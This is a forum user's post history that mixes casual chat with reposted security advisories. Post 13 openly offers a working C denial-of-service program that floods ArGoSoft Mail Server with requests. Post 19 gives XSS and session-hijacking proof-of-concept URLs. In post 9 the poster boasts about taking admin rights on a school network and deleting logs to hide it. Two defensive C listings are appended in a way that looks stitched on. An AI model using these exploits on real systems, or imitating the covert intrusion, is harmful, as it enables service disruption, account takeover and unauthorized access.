Everything posted by amdphr3@kXP

  1. LOL yeh i thought ud say that
  2. Hmm judging by that, i would hav thought that it was an IRQ conflict. Interesting... . Can ya post a screenie of ur device manager? Let us kno if the patch fixes it...
  3. yeh just to be sure, write down the sizes and that so u can recreate em how u want them
  4. yes, thats right, that was happening to me b4 i put more ram in my pc, now it works like a dream. The error that u described bex, i was gettin that in the form of a BSOD. But instead of it rebooting, it would hang and id hav 2 turn off my pc to get it to reboot
  5. Ur partition(s) may hav been corrupted by a virus, I had the same prob with my machine recently and fixed it by repartitioning. Try repartitioning ur drive
  6. rufo_what_tiggers_do_best nah not me
  7. Well, finally i created a sig, hope yas like it . Apologies to mods/admins for postin it here, this is the only forum i hav rights to upload a file. Can yas please move this to graphics forum?
  8. yeh tinman, you should get urself a copy of ver 2, very gud
  9. SE ABEO. The network admin at the school i used to go to had no idea. The network was based on novell netware 4.0. We all got given a login account for loggin in to the server, with our own 10 meg volumes. Anyway when he set em all up, he forgot to disable our permissions to write login scripts. So, I wrote a login script to log me in as an equivalent to an admin, next time i logged in, bam, had admin rights. Deleted the login logs and cleared the login script so they wouldn't catch me
  10. what bands/singers/songs do you all like to listen to? I like to listen to a bit of everything. Top ten for me would hav to be: 1. Metallica 2. Evanescence 3. Godskitchen 4. Linkin Park 5. DJ Tiesto 6. Millencolin 7. Pennywise 8. Staind 9. Dropkick Murphys 10. Sex Pistols
  11. welcome to MSFN, tinbin, hope u enjoy ur stay here
  12. lol yeh a free trial version would b nice
  13. Denial of Service Attack against ArGoSoft Mail Server Version 1.8
      VULNERABLE VERSIONS: 1.8 (1.8.3.5)
      NOT VULNERABLE VERSIONS: 1.8 Plus and 1.8 Prof
      RISK: Medium
      IMPACT: Denial of Service Attack
      Remote DoS: A security vulnerability in ArGoSoft Mail Server "Freeware" allows remote attackers to crash the server by issuing too many "GET" requests. The command can be issued to the mail server by everyone. The attacker needs no authentication.
      EXPLOIT

        /* The headers and comparison operators below were lost when the
         * post was extracted (angle brackets read as HTML tags); they are
         * restored so the listing compiles. Behaviour is unchanged. */
        #include <stdio.h>
        #include <stdlib.h>
        #include <string.h>
        #include <unistd.h>
        #include <netdb.h>
        #include <sys/socket.h>
        #include <netinet/in.h>
        #include <arpa/inet.h>

        int main(int argc, char *argv[])
        {
            int port, sockfd;
            struct sockaddr_in server;
            struct hostent *host;
            char sendstring[1024];

            /* one plain HTTP request, sent over and over on fresh sockets */
            strcpy(sendstring, "GET /index.html HTTP/1.0\n\n");
            if (argc < 3) {
                printf("Usage: %s [target] \n", argv[0]);
                exit(0);
            }
            port = atoi(argv[2]);
            host = gethostbyname(argv[1]);
            if (host == NULL) {
                printf("Connection failed!...\n");
                exit(0);
            }
            server.sin_family = AF_INET;
            server.sin_port = htons(port);
            /* note: uses inet_addr() on argv[1], so a dotted IP is expected */
            server.sin_addr.s_addr = inet_addr((char *)argv[1]);
            printf("Dos against ArGoSoft Mail Server Version 1.8 (1.8.3.5)\n");
            for (;;) {
                if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
                    printf("socket() failed!\n");
                    exit(0);
                }
                if (connect(sockfd, (struct sockaddr *)&server, sizeof(server)) < 0) {
                    printf("connect() failed!\n");
                    close(sockfd);
                }
                /* a failed write (including after a failed connect) ends the loop */
                if (write(sockfd, sendstring, strlen(sendstring)) < 0) {
                    break;
                }
                close(sockfd);
            }
            printf("Attack done!...\n");
            return 0;
        }

      This error will produce a "crash" of the ArGoSoft Mail Server.
      SOLUTIONS
      No solution for the moment.
  14. Low risk vulnerabilities in ftp file list handling Several ftp parsing libraries are vulnerable to attack by simply feeding them too much data. While the library authors have taken care to be robust in parsing ftp NLST returns they don't iterate the data as they receive it but store the data until the NLST completes. In the case of rpm a user using rpm -Uvh *ftp://foo.bar.com/updates/* and hitting a rogue server can be fed 1Gb of data at which point rpm does a In the case of gnome-1.x the gnome library string routines are used and these use an int for size management. Gnome 2.x fixes this problem and uses size_t so is not exploitable. Even in the non vulnerable applications there are out of memory annoyance value attacks as a result of this way of handling file lists. This attack is not actually that useful fortunately. The end user has to trigger the access, and has to accept >1Gb of data without getting suspicious. In addition the gnome-1.x variant is only exploitable on systems where sizeof(int) I have not inspected other ftp NLST parsing applications but it seems people should take a look to see who else is buffering too much data in RAM or not checking for size wraps. Gnome and RPM maintainers were informed in advance in April.
  15. New lyskom-server packages fix denial of service
      Package : lyskom-server
      Vulnerability : denial of service
      Problem-Type : remote
      Debian-specific: no
      Calle Dybedahl discovered a bug in lyskom-server which could result in a denial of service where an unauthenticated user could cause the server to become unresponsive as it processes a large query.
      For the stable distribution (woody) this problem has been fixed in version 2.0.6-1woody1.
      The old stable distribution (potato) does not contain a lyskom-server package.
      For the unstable distribution (sid) this problem is fixed in version 2.0.7-2.
      We recommend that you update your lyskom-server package.
      Upgrade Instructions
      --------------------
      wget url will fetch the file for you
      dpkg -i file.deb will install the referenced file.
      If you are using the apt-get package manager, use the line for sources.list as given below:
      apt-get update will update the internal database
      apt-get upgrade will install corrected packages
      You may use an automated update by adding the resources from the footer to the proper configuration.
  16. New webmin packages fix remote session ID spoofing
      Package : webmin
      Vulnerability : session ID spoofing
      Problem-Type : remote
      Debian-specific: no
      miniserv.pl in the webmin package does not properly handle metacharacters, such as line feeds and carriage returns, in Base64-encoded strings used in Basic authentication. This vulnerability allows remote attackers to spoof a session ID, and thereby gain root privileges.
      For the stable distribution (woody) this problem has been fixed in version 0.94-7woody1.
      The old stable distribution (potato) does not contain a webmin package.
      For the unstable distribution (sid) this problem is fixed in version 1.070-1.
      We recommend that you update your webmin package.
      Upgrade Instructions
      --------------------
      wget url will fetch the file for you
      dpkg -i file.deb will install the referenced file.
      If you are using the apt-get package manager, use the line for sources.list as given below:
      apt-get update will update the internal database
      apt-get upgrade will install corrected packages
      You may use an automated update by adding the resources from the footer to the proper configuration.
  17. SRT2003-06-12-0853 - ike-scan local root format string issue
      Product : ike-scan
      Version : 1.0 & 1.1
      Local format string issue in logging functions
      What to do : Please upgrade ike-scan to version 1.2
      In the course of performing security assessments and penetration tests for their customers, http://www.nta-monitor.com has found that VPN systems often provide full access to the internal network which makes them tempting targets to an attacker. In addition, many people assume that their VPN servers are invisible and impenetrable which is a dangerous assumption given that research at NTA shows that IPsec VPN systems can be discovered and the manufacturer identified. When this potential for discovery and identification is combined with the fact that several VPN vulnerabilities have been reported in the past few months, it would seem to be only a matter of time before hackers start to target VPN systems. With this in mind, NTA took the decision to raise awareness of this serious industry problem by producing a white paper on how VPN servers can be detected and identified, combined with the development of a security-auditing program "ike-scan." The concepts behind ike-scan can be located in the following pdf.
      http://www.nta-monitor.com/ike-scan/whitepaper.pdf
      In a default configuration ike-scan is not suid root. The suid bit is not set during the install. As an admin you may have been tricked by a user that was perhaps higher on the food chain than you and he really wanted to use ike-scan so you had to chmod +s /usr/local/bin/ike-scan for him. In other words there is potential for this to be exploited.
      [root@Immunity root]# su - nobody
      sh-2.05$ /usr/local/bin/ike-scan 127.0.0.1
      ERROR: Could not bind UDP socket to local port 500
      You need to be root, or ike-scan must be suid root to bind to ports below 1024.
      Only one process may bind to a given port at any one time.
      bind: Permission denied
  18. SuSE Security Announcement: radiusd-cistron (SuSE-SA:2003:030)
      SuSE Security Announcement
      Package: radiusd-cistron
      Announcement-ID: SuSE-SA:2003:030
      Date: Friday, Jun 13th 2003 09:32 MET
      Affected products: 7.2, 7.3, 8.0
      Vulnerability Type: possible remote system compromise
      SuSE default package: no
      Cross References: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=196063
      Content of this advisory:
      1) security vulnerability resolved: handling too large NAS numbers
         problem description, discussion, solution and upgrade information
      2) pending vulnerabilities, solutions, workarounds:
         - lprng
         - frox
         - poster
         - ghostscript-library
      3) standard appendix (further information)
      ______________________________________________________________________________
      1) problem description, brief discussion, solution, upgrade information
      The package radiusd-cistron is an implementation of the RADIUS protocol. Unfortunately the RADIUS server does not handle too large NAS numbers correctly. This leads to overwriting internal memory of the server process and may be abused to gain remote access to the system the RADIUS server is running on. There is no temporary workaround known.
      Please download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement. Then, install the package using the command "rpm -Fhv file.rpm" to apply the update. Our maintenance customers are being notified individually. The packages are being offered to install from the maintenance web. Please note, missing packages will be published as soon as possible.
      ______________________________________________________________________________
      2) Pending vulnerabilities in SuSE Distributions and Workarounds:
      - lprng: A race condition in psbanner was fixed that can be abused by local users to overwrite files owned by daemon:lp. New packages are available on our FTP servers.
      - frox: The init script of frox handled tmp files in an insecure manner. This behavior can be exploited by local users. New packages are available on our FTP servers.
      - poster: A possible buffer overflow due to usage of gets() was fixed which could have been exploited by malicious input data to execute code under the user id of the user running poster. New packages are available on our FTP servers.
- ghostscript-library Malicious PostScript[tm] files could execute shell commands even if the ghostscript interpreter was invoked with the -dSAFER flag. ______________________________________________________________________________ 3) standard appendix: authenticity verification, additional information - Package authenticity verification: SuSE update packages are available on many mirror ftp servers all over the world. While this service is being considered valuable and important to the free and open source software community, many users wish to be sure about the origin of the package and its content before installing the package. There are two verification methods that can be used independently from each other to prove the authenticity of a downloaded file or rpm package: 1) md5sums as provided in the (cryptographically signed) announcement. 2) using the internal gpg signatures of the rpm package. 1) execute the command md5sum after you downloaded the file from a SuSE ftp server or its mirrors. Then, compare the resulting md5sum with the one that is listed in the announcement. Since the announcement containing the checksums is cryptographically signed (usually using the key security@suse.de), the checksums show proof of the authenticity of the package. We disrecommend to subscribe to security lists which cause the email message containing the announcement to be modified so that the signature does not match after transport through the mailing list software. Downsides: You must be able to verify the authenticity of the announcement in the first place. If RPM packages are being rebuilt and a new version of a package is published on the ftp server, all md5 sums for the files are useless. 2) rpm package signatures provide an easy way to verify the authenticity of an rpm package. Use the command rpm -v --checksig to verify the signature of the package, where is the filename of the rpm package that you have downloaded. 
Of course, package authenticity verification can only target an un-installed rpm package file. Prerequisites: a) gpg is installed The package is signed using a certain key. The public part of this key must be installed by the gpg program in the directory ~/.gnupg/ under the user's home directory who performs the signature verification (usually root). You can import the key that is used by SuSE in rpm packages for SuSE Linux by saving this announcement to a file ("announcement.txt") and running the command (do "su -" to be root): gpg --batch; gpg SuSE Linux distributions version 7.1 and thereafter install the key "build@suse.de" upon installation or upgrade, provided that the package gpg is installed. The file containing the public key is placed at the top-level directory of the first CD (pubring.gpg) and at ftp://ftp.suse.com/pub/suse/pubring.gpg-build.suse.de . - SuSE runs two security mailing lists to which any interested party may subscribe: suse-security@suse.com - general/linux/SuSE security discussion. All SuSE security announcements are sent to this list. To subscribe, send an email to . suse-security-announce@suse.com - SuSE's announce-only mailing list. Only SuSE's security announcements are sent to this list. To subscribe, send an email to
  19. Sphera Hosting Director Control Panel Multiple Vulnerabilities: XSS - Session Hijacking - DoS/Buffer Overflow - Another User Accounts access
      Versions: VULNERABLE - 3.x - 2.x - 1.x
      HostingDirector comprises three fundamental components that are integrated to provide rich offerings, maximum control for resellers and site owners, and easy, centralized administration of shared and dedicated environments running on Linux and Microsoft Windows®.
      SECURITY HOLES FOUND and PROOFS OF CONCEPT:
      XSS in LOGIN
      I encountered XSS (Cross Site Scripting) vulnerabilities in SPHERA's product called Hosting Director, located in the vds (user of hosting plans) control panel. The problems, i think, are related to form tag closing by url code injection and the input validation system (there isn't any). In addition the success_msg variable (in internal scripts) is vulnerable to XSS too. With this you can insert html and script code by url command passing like this:
      XSS IN THE LOGIN FORM:
      http://[TARGET]/[iNSTALLATION PATH]/login/sm_login_screen.php?uid=">[XSS ATTACK CODE]
      http://[TARGET]/[iNSTALLATION PATH]/login/sm_login_screen.php?error=">[XSS ATTACK CODE]
      http://[TARGET]/[iNSTALLATION PATH]/login/sm_login_screen.php?error=[XSS ATTACK CODE COMBINED WITH OTHER VARIABLE TO EMULATE A REAL ERROR LIKE "EITHER PASSWORD OR USER ARE INCORRECT, RE-FILL IN" TO STEAL THE USER DATA]
      http://[TARGET]/[iNSTALLATION PATH]/login/login_screen.php?vds_ip=[VDS DOMAIN OR IP]&uid=">[XSS ATTACK CODE]&tz=[TIMEZONE CODE, TRY CEST]&vds_server_ip=">[XSS ATTACK CODE]
      SAMPLES
      https://[TARGET]/[iNSTALLATION PATH]/login/login_screen.php?vds_ip=[VDS DOMAIN OR IP]&uid=">here%20comes%20your%20attack&tz=CEST&vds_server_ip=">Here%20comes%20your%20XSS%20Attack&error=Either+user+or+password+are+incorrect+,+please+re-fill+in+.
      https://[TARGET]/[iNSTALLATION PATH]/login/sm_login_screen.php?uid=">XSS%20!
      COMMUNICATIONS ENCRYPTION
      Sphera uses an "insecure" communications data encryption (DES (16)). DES is a not very secure algorithm (i think). In addition the control panel scripts don't check if you are using the https protocol and allow you to use http connections on port 80 (without SSL).
      SESSION HIJACKING
      This is a very interesting thing in Sphera Hosting Director VDS Control Panel: if you don't close a session in the control panel, the session is saved all the time that you use the cookie and the system doesn't close the session if you don't close it with the control panel! This can be a big security problem if an attacker generates a session id randomizing control. I explain it: if the first session id that you received is this: xx01xx01xxX and the next session id is xx01xx02Xxx, the first session id only differs in two parts from the second session; this indicates poor session id randomizing. The attacker can generate a profile analyzing the random session generating and make an algorithm or script to make valid sessions; this can be used to enter the system only changing the USER ID value and you have access to the system with the USER ID permissions! ;-) I think in another possibility generating session id randomizing profiles like monitoring the use of resources and the stack blocks but this is very difficult for remote users. The remote method is not very easy but very possible.
      BUFFER OVERFLOW AND DoS
      I found some possible buffer overflows and Denial of Service attacks. Some php files used by the vds control panel environment can conduct denial of service attacks to the installation server. Other php files can conduct stack attacks by url-based variable hacking and command injection. You can enter some crafted urls spoofing the variables and your referer to make actions in other user accounts.
      - Some Proof of Concepts -
      http://[TARGET]/[iNSTALLATION PATH]/dev/VDS/submitted.php
      Sphera Control Panel global used php file; this file can be used to conduct DoS and Buffer Overflow attacks to the [TARGET] server with Sphera VDS Control Panel installed in [iNSTALLATION PATH]. i tell you some samples: Make a connection in POST mode and request this:
      http://[TARGET]/[iNSTALLATION PATH]/dev/VDS/submitted.php?[TARGET USER]\activeservices\http||watchdog_running=[false]&restart_vds=on&success_msg=Remote USER VDS restarted trough this kind of attack
      I think that the system checks your referer to authenticate the request, but you can spoof it easily. With this kind of attacks you can make actions in other users' hosting accounts like password changing, virtual server restarting, watchdog deactivating and other features ;-)
  20. note the POS, cuz it is. I just learn to put up with it till i can get a new one, hopefully as soon as i get me tax return. It runs winxp an 2k3 reasonably (surprisingly). I dont even attempt to run games cuz they get a fr of 10fps max in UT...pfft, so theres no point
  21. LOL are there any mods available for version 2.0?
  22. lol hahaha I got no come back for that one, 0wn3d
  23. wow i was just own3d by bex *rufo goes and hides in the corner* w00t
  24. Just a little forum to see who enjoys a beer and what kind. Post away! I like beer, and usually drink tooheys extra dry/new/red
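Post 14 above describes ftp clients that buffer an entire NLST reply and track its size in an int. The following is an added example, not code from rpm, gnome or the advisory, of a bounded NLST reader that handles entries as they arrive, caps the total at a constructed 1 MiB limit and checks the size arithmetic for wrap before it happens; the names and limits are assumptions.

```c
/* Added example, not from the advisory, rpm or gnome: a bounded reader for
 * ftp NLST output that handles entries as they arrive instead of storing
 * the whole listing, and that checks its size arithmetic for wrap. */
#include <stddef.h>
#include <string.h>

#define NLST_MAX_TOTAL (1u << 20)  /* constructed limit: 1 MiB per listing */
#define NLST_MAX_LINE  512         /* longest entry (file name line) accepted */

struct nlst_reader {
    char   line[NLST_MAX_LINE + 1];
    size_t line_len;   /* bytes currently held in line[] */
    size_t total;      /* bytes accepted so far for this listing */
    size_t entries;    /* complete entries delivered so far */
    int    error;      /* set once a limit has been exceeded */
};

void nlst_init(struct nlst_reader *r) { memset(r, 0, sizeof *r); }

/* Called for each complete entry; here it only counts. A real client would
 * act on the name (queue the download) and then forget it. */
static void nlst_entry(struct nlst_reader *r, const char *name) {
    (void)name;
    r->entries++;
}

/* Feed one received chunk. Returns 0 on success, -1 once a limit is hit;
 * after -1 the caller must abort the transfer rather than keep reading. */
int nlst_feed(struct nlst_reader *r, const char *buf, size_t len) {
    if (r->error) return -1;
    /* Overflow-safe cap check: compare len against the remaining headroom
     * instead of computing r->total + len, which could wrap around. */
    if (len > NLST_MAX_TOTAL - r->total) { r->error = 1; return -1; }
    r->total += len;

    for (size_t i = 0; i < len; i++) {
        char c = buf[i];
        if (c == '\n') {
            if (r->line_len && r->line[r->line_len - 1] == '\r')
                r->line_len--;                 /* strip CR of CRLF */
            r->line[r->line_len] = '\0';
            if (r->line_len) nlst_entry(r, r->line);
            r->line_len = 0;
        } else {
            /* An entry longer than NLST_MAX_LINE is treated as hostile. */
            if (r->line_len >= NLST_MAX_LINE) { r->error = 1; return -1; }
            r->line[r->line_len++] = c;
        }
    }
    return 0;
}

/* Feed a constructed listing in chunks of `chunk` bytes; returns the number
 * of entries, or (size_t)-1 if the reader rejected the data. */
size_t nlst_count_entries(const char *listing, size_t chunk) {
    struct nlst_reader r;
    size_t n = strlen(listing);
    nlst_init(&r);
    for (size_t off = 0; off < n; off += chunk) {
        size_t l = (n - off < chunk) ? n - off : chunk;
        if (nlst_feed(&r, listing + off, l) < 0) return (size_t)-1;
    }
    return r.entries;
}

/* Simulate a rogue server streaming `total` bytes with no line break
 * (the "feed it too much data" case). Returns 1 if the reader refused
 * before buffering it all, 0 if it accepted everything. */
int nlst_rejects_endless(size_t total) {
    struct nlst_reader r;
    char chunk[256];
    nlst_init(&r);
    memset(chunk, 'A', sizeof chunk);
    for (size_t sent = 0; sent < total; sent += sizeof chunk)
        if (nlst_feed(&r, chunk, sizeof chunk) < 0) return 1;
    return 0;
}
```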
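Post 16 above concerns Basic-authentication credentials whose Base64 text carries line feeds or carriage returns into the session logic. The following is an added example, not webmin's own code, of a strict Base64 decoder and credential parser that rejects such metacharacters both in the encoded text and in the decoded bytes; the function names and the 256-byte credential limit are assumptions.

```c
/* Added example (not webmin's code): strict handling of an HTTP Basic
 * credential. Any encoded character outside the Base64 alphabet and any
 * decoded control character (CR, LF, ...) causes rejection, so such bytes
 * never reach the code that handles user names or session ids. */
#include <stddef.h>
#include <string.h>

#define CRED_MAX 256   /* assumed upper bound on a decoded credential */

static int b64_value(char c) {
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;                      /* '\r', '\n', ' ' and anything else */
}

/* Strict Base64 decode: no whitespace, no embedded line breaks, padding
 * only at the end. Returns the decoded length or -1 on any violation. */
int b64_decode_strict(const char *in, unsigned char *out, size_t out_cap) {
    size_t n = strlen(in), o = 0;
    if (n == 0 || n % 4 != 0) return -1;
    for (size_t i = 0; i < n; i += 4) {
        int v[4], pad = 0;
        for (int k = 0; k < 4; k++) {
            char c = in[i + k];
            if (c == '=') {
                /* '=' is allowed only in the last group, positions 2 and 3 */
                if (i + 4 != n || k < 2) return -1;
                v[k] = 0; pad++;
            } else {
                if (pad) return -1;          /* data after padding */
                v[k] = b64_value(c);
                if (v[k] < 0) return -1;     /* CR, LF or other junk */
            }
        }
        unsigned char b[3] = {
            (unsigned char)((v[0] << 2) | (v[1] >> 4)),
            (unsigned char)(((v[1] & 0xF) << 4) | (v[2] >> 2)),
            (unsigned char)(((v[2] & 0x3) << 6) | v[3]) };
        for (int k = 0; k < 3 - pad; k++) {
            if (o >= out_cap) return -1;
            out[o++] = b[k];
        }
    }
    return (int)o;
}

/* Split "user:password" out of a Basic credential. Returns 1 and fills
 * user/pass (NUL-terminated) when accepted, 0 when the credential is
 * rejected for any reason. */
int basic_auth_parse(const char *b64, char *user, size_t ucap,
                     char *pass, size_t pcap) {
    unsigned char raw[CRED_MAX];
    int len = b64_decode_strict(b64, raw, sizeof raw);
    if (len <= 0) return 0;
    int colon = -1;
    for (int i = 0; i < len; i++) {
        /* Reject every control character (0x00-0x1F, 0x7F): this is where
         * the line feeds and carriage returns from the advisory would sit. */
        if (raw[i] < 0x20 || raw[i] == 0x7F) return 0;
        if (raw[i] == ':' && colon < 0) colon = i;
    }
    if (colon <= 0) return 0;       /* need a non-empty user and a ':' */
    size_t ul = (size_t)colon, pl = (size_t)(len - colon - 1);
    if (ul >= ucap || pl >= pcap) return 0;
    memcpy(user, raw, ul); user[ul] = '\0';
    memcpy(pass, raw + colon + 1, pl); pass[pl] = '\0';
    return 1;
}
```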